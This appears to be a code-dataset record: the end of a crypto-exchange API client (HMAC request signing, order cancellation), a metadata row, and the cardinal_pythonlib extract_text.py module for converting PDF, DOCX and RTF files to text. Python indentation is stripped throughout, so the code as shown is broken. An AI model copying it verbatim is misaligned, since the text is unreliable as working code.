response = self.privatePostOrderById(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data, market)
def cancel_order(self, id, symbol=None, params={}):
# {"error":false,"errorMessage":null,"data":{"success":true,"remainingAmount":0.01}}
request = {'orderId': id}
response = self.privatePostCancelOrderWithInfo(self.extend(request, params))
return {
'info': response,
}
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
self.check_required_credentials()
nonce = str(self.nonce())
auth = nonce + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.urlencode(self.extend({
'clientId': self.uid,
'nonce': nonce,
'publicKey': self.apiKey,
'signature': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is not None:
if 'error' in response:
# {"error":true,"errorMessage":"Minimum Order Size 0.01 ETH","data":null}
if response['error']:
message = self.safe_string(response, 'errorMessage')
feedback = self.id + ' ' + message
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(self.id + ' ' + self.json(response))
if code > 400:
if body:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], body, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
raise ExchangeError(self.id + ' ' + body)
| true
| true
|
1c447420694ed8036a9668092025459314e6c7cc
| 51,718
|
py
|
Python
|
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
cardinal_pythonlib/extract_text.py
|
bopopescu/pythonlib
|
9c2187d6092ba133342ca3374eb7c86f9d296c30
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# cardinal_pythonlib/extract_text.py
"""
===============================================================================
Original code copyright (C) 2009-2020 Rudolf Cardinal (rudolf@pobox.com).
This file is part of cardinal_pythonlib.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
**Converts a bunch of stuff to text, either from external files or from
in-memory binary objects (BLOBs).**
Prerequisites:
.. code-block:: bash
sudo apt-get install antiword
    pip install python-docx pdfminer
- Author: Rudolf Cardinal (rudolf@pobox.com)
- Created: Feb 2015
- Last update: 24 Sep 2015
See also:
- Word
- http://stackoverflow.com/questions/125222
- http://stackoverflow.com/questions/42482
- PDF
- http://stackoverflow.com/questions/25665
- https://pypi.python.org/pypi/slate
- http://stackoverflow.com/questions/5725278
- RTF
- unrtf
- http://superuser.com/questions/243084/rtf-to-txt-on-unix
- Multi-purpose:
- https://pypi.python.org/pypi/fulltext/
- https://media.readthedocs.org/pdf/textract/latest/textract.pdf
- DOCX
- http://etienned.github.io/posts/extract-text-from-word-docx-simply/
"""
# =============================================================================
# Imports
# =============================================================================
import argparse
from io import StringIO # Python 3
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import textwrap
from typing import (
BinaryIO, Dict, Generator, Iterable, Iterator, List, Optional, Union,
)
from xml.etree import ElementTree as ElementTree
# ... cElementTree used to be the fast implementation; now ElementTree is fast
# and cElementTree is deprecated; see
# https://docs.python.org/3.4/library/xml.etree.elementtree.html
import zipfile
import bs4
import prettytable
from semantic_version import Version
# import texttable # ... can't deal with Unicode properly
from cardinal_pythonlib.logs import get_brace_style_log_with_null_handler
try:
import chardet
from chardet.universaldetector import UniversalDetector
except ImportError:
chardet = None
UniversalDetector = None
try:
# noinspection PyPackageRequirements
import docx # pip install python-docx (NOT docx) - BUT python-docx requires lxml which has C dependencies # noqa
# noinspection PyPackageRequirements
import docx.document
# noinspection PyPackageRequirements
import docx.oxml.table
# noinspection PyPackageRequirements
import docx.oxml.text.paragraph
# noinspection PyPackageRequirements
import docx.table
# noinspection PyPackageRequirements
import docx.text.paragraph
DOCX_DOCUMENT_TYPE = "docx.document.Document"
DOCX_TABLE_TYPE = Union["docx.table.Table", "CustomDocxTable"]
DOCX_CONTAINER_TYPE = Union[DOCX_DOCUMENT_TYPE, "docx.table._Cell"]
DOCX_BLOCK_ITEM_TYPE = Union["docx.text.paragraph.Paragraph",
"docx.table.Table"]
except ImportError:
docx = None
DOCX_DOCUMENT_TYPE = None
DOCX_TABLE_TYPE = "CustomDocxTable"
DOCX_CONTAINER_TYPE = None
DOCX_BLOCK_ITEM_TYPE = None
try:
import docx2txt # pip install docx2txt
except ImportError:
docx2txt = None
try:
# noinspection PyPackageRequirements
import pdfminer # pip install pdfminer
# noinspection PyPackageRequirements
import pdfminer.pdfinterp
# noinspection PyPackageRequirements
import pdfminer.converter
# noinspection PyPackageRequirements
import pdfminer.layout
# noinspection PyPackageRequirements
import pdfminer.pdfpage
except ImportError:
pdfminer = None
try:
# noinspection PyPackageRequirements
import pyth # pip install pyth (PYTHON 2 ONLY; https://pypi.python.org/pypi/pyth/0.5.4) # noqa
# noinspection PyPackageRequirements
import pyth.plugins.rtf15.reader
# noinspection PyPackageRequirements
import pyth.plugins.plaintext.writer
except ImportError:
pyth = None
log = get_brace_style_log_with_null_handler(__name__)
# =============================================================================
# Constants
# =============================================================================
AVAILABILITY = 'availability'
CONVERTER = 'converter'
DEFAULT_WIDTH = 120
DEFAULT_MIN_COL_WIDTH = 15
SYS_ENCODING = sys.getdefaultencoding()
ENCODING = "utf-8"
# =============================================================================
# External tool map
# =============================================================================
tools = {
'antiword': shutil.which('antiword'), # sudo apt-get install antiword
'pdftotext': shutil.which('pdftotext'), # core part of Linux?
'strings': shutil.which('strings'), # part of standard Unix
'strings2': shutil.which('strings2'),
# ... Windows: https://technet.microsoft.com/en-us/sysinternals/strings.aspx # noqa
# ... Windows: http://split-code.com/strings2.html
'unrtf': shutil.which('unrtf'), # sudo apt-get install unrtf
}
def does_unrtf_support_quiet() -> bool:
"""
The unrtf tool supports the '--quiet' argument from a version that I'm not
quite sure of, where ``0.19.3 < version <= 0.21.9``. We check against
0.21.9 here.
"""
required_unrtf_version = Version("0.21.9")
# ... probably: http://hg.savannah.gnu.org/hgweb/unrtf/
# ... 0.21.9 definitely supports --quiet
# ... 0.19.3 definitely doesn't support it
unrtf_filename = shutil.which('unrtf')
if not unrtf_filename:
return False
p = subprocess.Popen(["unrtf", "--version"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, err_bytes = p.communicate()
text = err_bytes.decode(sys.getdefaultencoding())
lines = text.split()
if len(lines) < 1:
return False
version_str = lines[0]
unrtf_version = Version(version_str)
return unrtf_version >= required_unrtf_version
UNRTF_SUPPORTS_QUIET = does_unrtf_support_quiet()
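# Note on the check above (illustrative): semantic_version.Version compares by
# semver ordering, e.g. Version("0.21.9") >= Version("0.21.9") is True while
# Version("0.19.3") >= Version("0.21.9") is False, so only sufficiently new
# unrtf builds are offered the --quiet flag.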
def update_external_tools(tooldict: Dict[str, str]) -> None:
"""
Update the global map of tools.
Args:
tooldict: dictionary whose keys are tools names and whose values are
paths to the executables
"""
global tools
tools.update(tooldict)
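# Example (illustrative): point the RTF converter at a custom unrtf binary
# before any extraction calls:
#
#   update_external_tools({'unrtf': '/usr/local/bin/unrtf'})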
# =============================================================================
# Text-processing config class
# =============================================================================
class TextProcessingConfig(object):
"""
Class to manage control parameters for text extraction, without having
to pass a lot of mysterious ``**kwargs`` around and lose track of what it
means.
All converter functions take one of these objects as a parameter.
"""
def __init__(self,
encoding: str = None,
width: int = DEFAULT_WIDTH,
min_col_width: int = DEFAULT_MIN_COL_WIDTH,
plain: bool = False,
semiplain: bool = False,
docx_in_order: bool = True,
horizontal_char="─",
vertical_char="│",
junction_char="┼",
plain_table_start: str = None,
plain_table_end: str = None,
plain_table_col_boundary: str = None,
plain_table_row_boundary: str = None,
rstrip: bool = True) -> None:
"""
Args:
encoding:
optional text file encoding to try in addition to
:func:`sys.getdefaultencoding`.
width:
overall word-wrapping width
min_col_width:
minimum column width for tables
plain:
as plain as possible (e.g. for natural language processing);
see :func:`docx_process_table`.
semiplain:
quite plain, but with some ASCII art representation of the
table structure.
docx_in_order:
for DOCX files: if ``True``, process paragraphs and tables in
the order they occur; if ``False``, process all paragraphs
followed by all tables
rstrip:
Right-strip whitespace from all lines?
horizontal_char:
horizontal character to use with PrettyTable, e.g. ``-`` or
``─``
vertical_char:
vertical character to use with PrettyTable, e.g. ``|`` or
``│``
junction_char:
junction character to use with PrettyTable, e.g. ``+`` or
``┼``
plain_table_start:
table start line to use with ``plain=True``
plain_table_end:
table end line to use with ``plain=True``
plain_table_col_boundary:
boundary between columns to use with ``plain==True``
plain_table_row_boundary:
boundary between rows to use with ``plain==True``
Example of a DOCX table processed with:
- ``plain=False, semiplain=False``
.. code-block:: none
┼─────────────┼─────────────┼
│ Row 1 col 1 │ Row 1 col 2 │
┼─────────────┼─────────────┼
│ Row 2 col 1 │ Row 2 col 2 │
┼─────────────┼─────────────┼
- ``plain=False, semiplain=True``
.. code-block:: none
─────────────────────────────
Row 1 col 1
─────────────────────────────
Row 1 col 2
─────────────────────────────
Row 2 col 1
─────────────────────────────
Row 2 col 2
─────────────────────────────
- ``plain=True``
.. code-block:: none
╔═════════════════════════════════════════════════════════════════╗
Row 1 col 1
───────────────────────────────────────────────────────────────────
Row 1 col 2
═══════════════════════════════════════════════════════════════════
Row 2 col 1
───────────────────────────────────────────────────────────────────
Row 2 col 2
╚═════════════════════════════════════════════════════════════════╝
The plain format is probably better, in general, for NLP, and is
definitely clearer with nested tables (for which the word-wrapping
algorithm is imperfect). We avoid "heavy" box drawing as it has a
higher chance of being mangled under Windows.
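        Example (a minimal sketch; ``report.docx`` is a hypothetical file):
        .. code-block:: python
            config = TextProcessingConfig(width=100, plain=True)
            text = document_to_text(filename="report.docx", config=config)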
"""
if plain and semiplain:
log.warning("You specified both plain and semiplain; using plain")
semiplain = False
middlewidth = width - 2 if width > 2 else 77
# double
if plain_table_start is None:
plain_table_start = "╔" + ("═" * middlewidth) + "╗"
if plain_table_end is None:
plain_table_end = "╚" + ("═" * middlewidth) + "╝"
    # double (row boundary)
if plain_table_row_boundary is None:
plain_table_row_boundary = "═" * (middlewidth + 2)
# light
if plain_table_col_boundary is None:
plain_table_col_boundary = "─" * (middlewidth + 2)
self.encoding = encoding
self.width = width
self.min_col_width = min_col_width
self.plain = plain
self.semiplain = semiplain
self.docx_in_order = docx_in_order
self.horizontal_char = horizontal_char
self.vertical_char = vertical_char
self.junction_char = junction_char
self.plain_table_start = plain_table_start
self.plain_table_end = plain_table_end
self.plain_table_col_boundary = plain_table_col_boundary
self.plain_table_row_boundary = plain_table_row_boundary
self.rstrip = rstrip
_DEFAULT_CONFIG = TextProcessingConfig()
# =============================================================================
# Support functions
# =============================================================================
def get_filelikeobject(filename: str = None,
blob: bytes = None) -> BinaryIO:
"""
Open a file-like object.
Guard the use of this function with ``with``.
Args:
filename: for specifying via a filename
blob: for specifying via an in-memory ``bytes`` object
Returns:
a :class:`BinaryIO` object
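    Example:
    .. code-block:: python
        with get_filelikeobject(blob=b"some bytes") as fp:
            data = fp.read()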
"""
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if filename:
return open(filename, 'rb')
else:
return io.BytesIO(blob)
# noinspection PyUnusedLocal
def get_file_contents(filename: str = None, blob: bytes = None) -> bytes:
"""
Returns the binary contents of a file, or of a BLOB.
"""
if not filename and not blob:
raise ValueError("no filename and no blob")
if filename and blob:
raise ValueError("specify either filename or blob")
if blob:
return blob
with open(filename, 'rb') as f:
return f.read()
def get_chardet_encoding(binary_contents: bytes) -> Optional[str]:
"""
Guess the character set encoding of the specified ``binary_contents``.
"""
if not binary_contents:
return None
if chardet is None or UniversalDetector is None:
log.warning("chardet not installed; limits detection of encodings")
return None
# METHOD 1
# http://chardet.readthedocs.io/en/latest/
#
# guess = chardet.detect(binary_contents)
#
# METHOD 2: faster with large files
# http://chardet.readthedocs.io/en/latest/
# http://stackoverflow.com/questions/13857856/split-byte-string-into-lines
# noinspection PyCallingNonCallable
detector = UniversalDetector()
for byte_line in binary_contents.split(b"\n"):
detector.feed(byte_line)
if detector.done:
break
guess = detector.result
# Handle result
if 'encoding' not in guess:
log.warning("Something went wrong within chardet; no encoding")
return None
return guess['encoding']
def get_file_contents_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Returns the string contents of a file, or of a BLOB.
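    Tries, in order: the encoding given in ``config`` (if any), the system
    default encoding, and finally the best guess from ``chardet`` (if
    installed); raises :exc:`ValueError` if all of these fail.
    Example:
    .. code-block:: python
        text = get_file_contents_text(blob="café".encode("utf-8"))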
"""
binary_contents = get_file_contents(filename=filename, blob=blob)
# 1. Try the encoding the user specified
if config.encoding:
try:
return binary_contents.decode(config.encoding)
except ValueError: # of which UnicodeDecodeError is more specific
# ... https://docs.python.org/3/library/codecs.html
pass
# 2. Try the system encoding
sysdef = sys.getdefaultencoding()
if sysdef != config.encoding:
try:
return binary_contents.decode(sysdef)
except ValueError:
pass
# 3. Try the best guess from chardet
# http://chardet.readthedocs.io/en/latest/usage.html
if chardet:
guess = chardet.detect(binary_contents)
if guess['encoding']:
return binary_contents.decode(guess['encoding'])
raise ValueError("Unknown encoding ({})".format(
f"filename={filename!r}" if filename else "blob"))
def get_cmd_output(*args, encoding: str = SYS_ENCODING) -> str:
"""
Returns text output of a command.
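    Example (assumes a Unix-like system with ``ls`` on the PATH):
    .. code-block:: python
        listing = get_cmd_output("ls", "-l")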
"""
log.debug("get_cmd_output(): args = {!r}", args)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.decode(encoding, errors='ignore')
def get_cmd_output_from_stdin(stdin_content_binary: bytes,
                              *args, encoding: str = SYS_ENCODING) -> str:
"""
Returns text output of a command, passing binary data in via stdin.
"""
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    stdout, stderr = p.communicate(input=stdin_content_binary)
return stdout.decode(encoding, errors='ignore')
def rstrip_all_lines(text: str) -> str:
"""
Right-strips all lines in a string and returns the result.
"""
return "\n".join(
line.rstrip()
for line in text.splitlines()
)
# =============================================================================
# PDF
# =============================================================================
# noinspection PyUnresolvedReferences,PyUnusedLocal
def convert_pdf_to_txt(filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a PDF file to text.
Pass either a filename or a binary object.
"""
pdftotext = tools['pdftotext']
if pdftotext: # External command method
if filename:
return get_cmd_output(pdftotext, filename, '-')
else:
return get_cmd_output_from_stdin(blob, pdftotext, '-', '-')
elif pdfminer: # Memory-hogging method
with get_filelikeobject(filename, blob) as fp:
rsrcmgr = pdfminer.pdfinterp.PDFResourceManager()
retstr = StringIO()
codec = ENCODING
laparams = pdfminer.layout.LAParams()
device = pdfminer.converter.TextConverter(
rsrcmgr, retstr, codec=codec, laparams=laparams)
interpreter = pdfminer.pdfinterp.PDFPageInterpreter(rsrcmgr,
device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in pdfminer.pdfpage.PDFPage.get_pages(
fp, pagenos, maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
interpreter.process_page(page)
            text = retstr.getvalue()  # io.StringIO already holds str
return text
else:
raise AssertionError("No PDF-reading tool available")
def availability_pdf() -> bool:
"""
Is a PDF-to-text tool available?
"""
pdftotext = tools['pdftotext']
if pdftotext:
return True
elif pdfminer:
log.warning("PDF conversion: pdftotext missing; "
"using pdfminer (less efficient)")
return True
else:
return False
# =============================================================================
# DOCX
# =============================================================================
# -----------------------------------------------------------------------------
# In a D.I.Y. fashion
# -----------------------------------------------------------------------------
# DOCX specification: http://www.ecma-international.org/news/TC45_current_work/TC45_available_docs.htm # noqa
DOCX_HEADER_FILE_REGEX = re.compile(r'word/header[0-9]*\.xml')
DOCX_DOC_FILE = 'word/document.xml'
DOCX_FOOTER_FILE_REGEX = re.compile(r'word/footer[0-9]*\.xml')
DOCX_SCHEMA_URL = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main' # noqa
def docx_qn(tagroot: str) -> str:
return f'{{{DOCX_SCHEMA_URL}}}{tagroot}'
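# ... builds Clark-notation qualified names, as used by ElementTree; e.g.
# docx_qn('t') == '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}t'  # noqa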
DOCX_TEXT = docx_qn('t')
DOCX_TABLE = docx_qn('tbl') # https://github.com/python-openxml/python-docx/blob/master/docx/table.py # noqa
DOCX_TAB = docx_qn('tab')
DOCX_NEWLINES = [docx_qn('br'), docx_qn('cr')]
DOCX_NEWPARA = docx_qn('p')
DOCX_TABLE_ROW = docx_qn('tr')
DOCX_TABLE_CELL = docx_qn('tc')
def gen_xml_files_from_docx(fp: BinaryIO) -> Iterator[str]:
"""
Generate XML files (as strings) from a DOCX file.
Args:
fp: :class:`BinaryIO` object for reading the ``.DOCX`` file
Yields:
the string contents of each individual XML file within the ``.DOCX``
file
Raises:
zipfile.BadZipFile: if the zip is unreadable (encrypted?)
"""
try:
z = zipfile.ZipFile(fp)
filelist = z.namelist()
for filename in filelist:
if DOCX_HEADER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
        yield z.read(DOCX_DOC_FILE).decode("utf8")
for filename in filelist:
if DOCX_FOOTER_FILE_REGEX.match(filename):
yield z.read(filename).decode("utf8")
except zipfile.BadZipFile:
# Clarify the error:
raise zipfile.BadZipFile("File is not a zip file - encrypted DOCX?")
class DocxFragment(object):
"""
Representation of a line, or multiple lines, which may or may not need
word-wrapping.
"""
# noinspection PyShadowingNames
def __init__(self, text: str, wordwrap: bool = True) -> None:
self.text = text
self.wordwrap = wordwrap
def docx_gen_wordwrapped_fragments(fragments: Iterable[DocxFragment],
width: int) -> Generator[str, None, None]:
"""
Generates word-wrapped fragments.
"""
to_wrap = [] # type: List[DocxFragment]
def yield_wrapped():
"""
Yield the word-wrapped stuff to date.
"""
nonlocal to_wrap
if to_wrap:
block = "".join(x.text for x in to_wrap)
wrapped = "\n".join(
wordwrap(line, width)
for line in block.splitlines()
)
yield wrapped
to_wrap.clear()
for f in fragments:
if f.wordwrap:
# Add it to the current wrapping block.
to_wrap.append(f)
else:
# Yield the wrapped stuff to date
yield from yield_wrapped()
# Yield the new, unwrapped
yield f.text
yield from yield_wrapped() # any leftovers
def docx_wordwrap_fragments(fragments: Iterable[DocxFragment],
width: int) -> str:
"""
Joins multiple fragments and word-wraps them as necessary.
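    Example (a minimal sketch):
    .. code-block:: python
        frags = [DocxFragment("text that may be wrapped "),
                 DocxFragment("a verbatim line\n", wordwrap=False)]
        print(docx_wordwrap_fragments(frags, width=20))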
"""
return "".join(docx_gen_wordwrapped_fragments(fragments, width))
def docx_gen_fragments_from_xml_node(
node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> Generator[DocxFragment, None, None]:
"""
Returns text from an XML node within a DOCX file.
Args:
node: an XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
tag = node.tag # for speed
log.debug("Level {}, tag {}", level, tag)
if tag == DOCX_TEXT:
log.debug("Text: {!r}", node.text)
yield DocxFragment(node.text or "")
elif tag == DOCX_TAB:
log.debug("Tab")
yield DocxFragment("\t")
elif tag in DOCX_NEWLINES: # rarely used? Mostly "new paragraph"
log.debug("Newline")
yield DocxFragment("\n")
elif tag == DOCX_NEWPARA: # Note that e.g. all table cells start with this
log.debug("New paragraph")
yield DocxFragment("\n\n")
# One or two newlines? Clarity better with two -- word-wrapping means
# that "single" source lines can take up multiple lines in text format.
# So we need a gap between lines to ensure paragraph separation is
# visible -- i.e. two newlines.
if tag == DOCX_TABLE:
log.debug("Table")
yield DocxFragment("\n", wordwrap=False)
yield DocxFragment(docx_table_from_xml_node(node, level, config),
wordwrap=False)
else:
for child in node:
for fragment in docx_gen_fragments_from_xml_node(
child, level + 1, config):
yield fragment
def docx_text_from_xml_node(node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
"""
Returns text from an XML node within a DOCX file.
Args:
node: an XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
return docx_wordwrap_fragments(
docx_gen_fragments_from_xml_node(node, level, config),
config.width)
def docx_text_from_xml(xml: str, config: TextProcessingConfig) -> str:
"""
Converts an XML tree of a DOCX file to string contents.
Args:
xml: raw XML text
config: :class:`TextProcessingConfig` control object
Returns:
contents as a string
"""
root = ElementTree.fromstring(xml)
return docx_text_from_xml_node(root, 0, config)
class CustomDocxParagraph(object):
"""
Represents a paragraph of text in a DOCX file.
"""
def __init__(self, text: str = '') -> None:
self.text = text or ''
def __repr__(self) -> str:
return f"CustomDocxParagraph(text={self.text!r})"
class CustomDocxTableCell(object):
"""
Represents a cell within a table of a DOCX file.
May contain several paragraphs.
"""
def __init__(self, paragraphs: List[CustomDocxParagraph] = None) -> None:
self.paragraphs = paragraphs or []
def add_paragraph(self, text: str) -> None:
self.paragraphs.append(CustomDocxParagraph(text))
def __repr__(self) -> str:
return f"CustomDocxTableCell(paragraphs={self.paragraphs!r})"
class CustomDocxTableRow(object):
"""
Represents a row within a table of a DOCX file.
May contain several cells (one per column).
"""
def __init__(self, cells: List[CustomDocxTableCell] = None) -> None:
self.cells = cells or []
def add_cell(self, cell: CustomDocxTableCell) -> None:
self.cells.append(cell)
def new_cell(self) -> None:
self.cells.append(CustomDocxTableCell())
def add_paragraph(self, text: str) -> None:
self.cells[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTableRow(cells={self.cells!r})"
class CustomDocxTable(object):
"""
Represents a table of a DOCX file.
May contain several rows.
"""
def __init__(self, rows: List[CustomDocxTableRow] = None) -> None:
self.rows = rows or []
def add_row(self, row: CustomDocxTableRow) -> None:
self.rows.append(row)
def new_row(self) -> None:
self.rows.append(CustomDocxTableRow())
def new_cell(self) -> None:
self.rows[-1].new_cell()
def add_paragraph(self, text: str) -> None:
self.rows[-1].add_paragraph(text)
def __repr__(self) -> str:
return f"CustomDocxTable(rows={self.rows!r})"
def docx_table_from_xml_node(table_node: ElementTree.Element,
level: int,
config: TextProcessingConfig) -> str:
"""
Converts an XML node representing a DOCX table into a textual
representation.
Args:
table_node: XML node
level: current level in XML hierarchy (used for recursion; start level
is 0)
config: :class:`TextProcessingConfig` control object
Returns:
string representation
"""
table = CustomDocxTable()
for row_node in table_node:
if row_node.tag != DOCX_TABLE_ROW:
continue
table.new_row()
for cell_node in row_node:
if cell_node.tag != DOCX_TABLE_CELL:
continue
table.new_cell()
for para_node in cell_node:
text = docx_text_from_xml_node(para_node, level, config)
if text:
table.add_paragraph(text)
return docx_process_table(table, config)
# -----------------------------------------------------------------------------
# Generic
# -----------------------------------------------------------------------------
def wordwrap(text: str, width: int) -> str:
"""
Word-wraps text.
Args:
text:
text to process (will be treated as a single line)
width:
width to word-wrap to (or 0 to skip word wrapping)
Returns:
wrapped text
.. code-block:: python
from cardinal_pythonlib.extract_text import *
text = "Here is a very long line that may be word-wrapped. " * 50
        print(wordwrap(text, 80))
"""
if not text:
return ''
if width:
return '\n'.join(textwrap.wrap(text, width=width))
return text
def docx_process_table(table: DOCX_TABLE_TYPE,
config: TextProcessingConfig) -> str:
"""
Converts a DOCX table to text.
Structure representing a DOCX table:
.. code-block:: none
table
.rows[]
.cells[]
.paragraphs[]
.text
That's the structure of a :class:`docx.table.Table` object, but also of our
homebrew creation, :class:`CustomDocxTable`.
- The ``plain`` and ``semiplain`` options are implemented via the
:class:`TextProcessingConfig`.
- Note also that the grids in DOCX files can have varying number of cells
per row, e.g.
.. code-block:: none
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 |
+---+---+
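    Example (a minimal sketch using the homebrew classes):
    .. code-block:: python
        t = CustomDocxTable()
        t.new_row()
        t.new_cell()
        t.add_paragraph("Row 1 col 1")
        t.new_cell()
        t.add_paragraph("Row 1 col 2")
        print(docx_process_table(t, _DEFAULT_CONFIG))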
"""
def get_cell_text(cell_) -> str:
cellparagraphs = [paragraph.text.strip()
for paragraph in cell_.paragraphs]
cellparagraphs = [x for x in cellparagraphs if x]
return '\n\n'.join(cellparagraphs)
if config.plain:
# ---------------------------------------------------------------------
# Plain -- good for NLP and better for word-wrapping
# ---------------------------------------------------------------------
lines = [config.plain_table_start] # type: List[str]
for r, row in enumerate(table.rows):
if r > 0:
lines.append(config.plain_table_row_boundary)
for c, cell in enumerate(row.cells):
if c > 0:
lines.append(config.plain_table_col_boundary)
lines.append(get_cell_text(cell))
lines.append(config.plain_table_end)
return "\n".join(lines)
else:
# ---------------------------------------------------------------------
# Full table visualization, or semiplain
# ---------------------------------------------------------------------
ncols = 1
# noinspection PyTypeChecker
for row in table.rows:
ncols = max(ncols, len(row.cells))
pt = prettytable.PrettyTable(
field_names=list(range(ncols)),
encoding=ENCODING,
header=False,
border=True,
hrules=prettytable.ALL,
vrules=prettytable.NONE if config.semiplain else prettytable.ALL,
# Can we use UTF-8 special characters?
# Even under Windows, sys.getdefaultencoding() returns "utf-8"
# (under Python 3.6.8, Windows 6.1.7601 = Windows Server 2008 R2).
# The advantage would be that these characters are not likely to
# influence any form of NLP.
horizontal_char=config.horizontal_char, # default "-"
vertical_char=config.vertical_char, # default "|"
junction_char=config.junction_char, # default "+"
)
pt.align = 'l'
pt.valign = 't'
pt.max_width = max(config.width // ncols, config.min_col_width)
if config.semiplain:
# noinspection PyTypeChecker
for row in table.rows:
for i, cell in enumerate(row.cells):
n_before = i
n_after = ncols - i - 1
# ... use ncols, not len(row.cells), since "cells per row"
# is not constant, but prettytable wants a fixed
# number. (changed in v0.2.8)
ptrow = (
[''] * n_before +
[get_cell_text(cell)] +
[''] * n_after
)
                    assert len(ptrow) == ncols
pt.add_row(ptrow)
else:
# noinspection PyTypeChecker
for row in table.rows:
ptrow = [] # type: List[str]
# noinspection PyTypeChecker
for cell in row.cells:
ptrow.append(get_cell_text(cell))
ptrow += [''] * (ncols - len(ptrow)) # added in v0.2.8
            assert len(ptrow) == ncols
pt.add_row(ptrow)
return pt.get_string()
# -----------------------------------------------------------------------------
# With the docx library
# -----------------------------------------------------------------------------
_ = '''
# noinspection PyProtectedMember,PyUnresolvedReferences
def docx_docx_iter_block_items(parent: DOCX_CONTAINER_TYPE) \
-> Iterator[DOCX_BLOCK_ITEM_TYPE]:
"""
Iterate through items of a DOCX file.
See https://github.com/python-openxml/python-docx/issues/40.
Yield each paragraph and table child within ``parent``, in document order.
Each returned value is an instance of either :class:`Table` or
:class:`Paragraph`. ``parent`` would most commonly be a reference to a main
:class:`Document` object, but also works for a :class:`_Cell` object, which
itself can contain paragraphs and tables.
NOTE: uses internals of the ``python-docx`` (``docx``) library; subject to
change; this version works with ``docx==0.8.5``.
"""
if isinstance(parent, docx.document.Document):
parent_elm = parent.element.body
elif isinstance(parent, docx.table._Cell):
parent_elm = parent._tc
else:
raise ValueError("something's not right")
for child in parent_elm.iterchildren():
if isinstance(child, docx.oxml.text.paragraph.CT_P):
yield docx.text.paragraph.Paragraph(child, parent)
elif isinstance(child, docx.oxml.table.CT_Tbl):
yield docx.table.Table(child, parent)
# noinspection PyUnresolvedReferences
def docx_docx_gen_text(doc: DOCX_DOCUMENT_TYPE,
config: TextProcessingConfig) -> Iterator[str]:
"""
Iterate through a DOCX file and yield text.
Args:
doc: DOCX document to process
config: :class:`TextProcessingConfig` control object
Yields:
pieces of text (paragraphs)
"""
    if config.docx_in_order:
for thing in docx_docx_iter_block_items(doc):
if isinstance(thing, docx.text.paragraph.Paragraph):
yield docx_process_simple_text(thing.text, config.width)
elif isinstance(thing, docx.table.Table):
yield docx_process_table(thing, config)
else:
for paragraph in doc.paragraphs:
yield docx_process_simple_text(paragraph.text, config.width)
for table in doc.tables:
yield docx_process_table(table, config)
'''
# noinspection PyUnusedLocal
def convert_docx_to_text(
filename: str = None, blob: bytes = None,
config: TextProcessingConfig = _DEFAULT_CONFIG) -> str:
"""
Converts a DOCX file to text.
Pass either a filename or a binary object.
Args:
filename: filename to process
blob: binary ``bytes`` object to process
config: :class:`TextProcessingConfig` control object
Returns:
text contents
Notes:
- Old ``docx`` (https://pypi.python.org/pypi/python-docx) has been
superseded (see https://github.com/mikemaccana/python-docx).
- ``docx.opendocx(file)`` uses :class:`zipfile.ZipFile`, which can take
either a filename or a file-like object
(https://docs.python.org/2/library/zipfile.html).
- Method was:
.. code-block:: python
with get_filelikeobject(filename, blob) as fp:
document = docx.opendocx(fp)
paratextlist = docx.getdocumenttext(document)
return '\n\n'.join(paratextlist)
- Newer ``docx`` is python-docx
- https://pypi.python.org/pypi/python-docx
- https://python-docx.readthedocs.org/en/latest/
- http://stackoverflow.com/questions/25228106
However, it uses ``lxml``, which has C dependencies, so it doesn't always
install properly on e.g. bare Windows machines.
PERFORMANCE of my method:
- nice table formatting
- but tables grouped at end, not in sensible places
- can iterate via ``doc.paragraphs`` and ``doc.tables`` but not in
true document order, it seems
- others have noted this too:
- https://github.com/python-openxml/python-docx/issues/40
